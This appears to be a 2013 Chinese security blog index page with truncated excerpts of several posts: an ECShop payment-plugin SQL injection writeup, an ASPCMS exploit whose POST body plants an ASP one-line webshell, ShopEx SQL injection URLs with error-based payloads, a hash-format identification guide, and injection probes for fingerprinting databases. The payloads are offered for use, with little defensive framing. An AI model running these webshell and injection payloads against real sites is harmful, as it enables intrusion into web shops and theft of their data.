ecshop 最新注入0day漏洞分析报告

分类:安全 | 2013-02-23 | 撸过 666 次
2人扯谈

漏洞作者:360

漏洞分析:Seay

博客:www.cnseay.com

 

今天习惯性的到处逛,看看文章。看到了360爆的一个ecshop 支付宝支付插件的注入漏洞,照例的分析下,360的团队还是挺赞的。

 

由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。

 

漏洞核心代码在includesmodulespaymentalipay.php 文件 respond()函数,第215行。[......]

继续阅读

ASPCMS 老版本秒杀拿SHELL

分类:安全 | 2013-02-12 | 撸过 1,846 次
1人扯谈

老的ASPCMS版本的秒杀拿SHELL漏洞

找到后台。。。然后

/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST

runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&S[......]

继续阅读

shopex两处通杀注入

分类:安全 | 2013-02-12 | 撸过 579 次
0人扯谈

一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
如何注入就不多说了,自己捉摸!

https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
https://www.webshell.cc/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
htt[......]

继续阅读

几种常见的hash加密,怎么判断hash的类型

分类:安全 | 2013-02-12 | 撸过 805 次
0人扯谈

题外话:最近对加密的方式讨论挺火的

--------------*nix系------------------------

系统:ES(Unix)

例子: IvS7aeT4NzQPM

说明:Linux或者其他linux内核系统中

长度: 13 个字符

描述:第1、2位为salt,例子中的'Iv'位salt,后面的为hash值

系统:MD5(Unix)

例子:$1$12345678$XM4P3PrKBgKNnTaqG9P0T/

说明:Linux或者其他linux内核系统中

长度:34个字符

描述:开始的$1$位为加密标志,后面8位12345678为加密使用的salt,后[......]

继续阅读

一个注射点如何最快速确认是什么类型数据库

分类:安全 | 2013-02-10 | 撸过 636 次
0人扯谈

 

假设这么一个注射点:

show.html?id=2

mysql:id=2 and version()>0

oracle:id=2 and '1'||'1'='11

其他的欢迎补充

1#

upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47

Access:

aNd aSc(cHr(97))=97

and exists(select id from MSysAccessObjects)

SQL Server:

and exists(select id from sysobjects)

and l[......]

继续阅读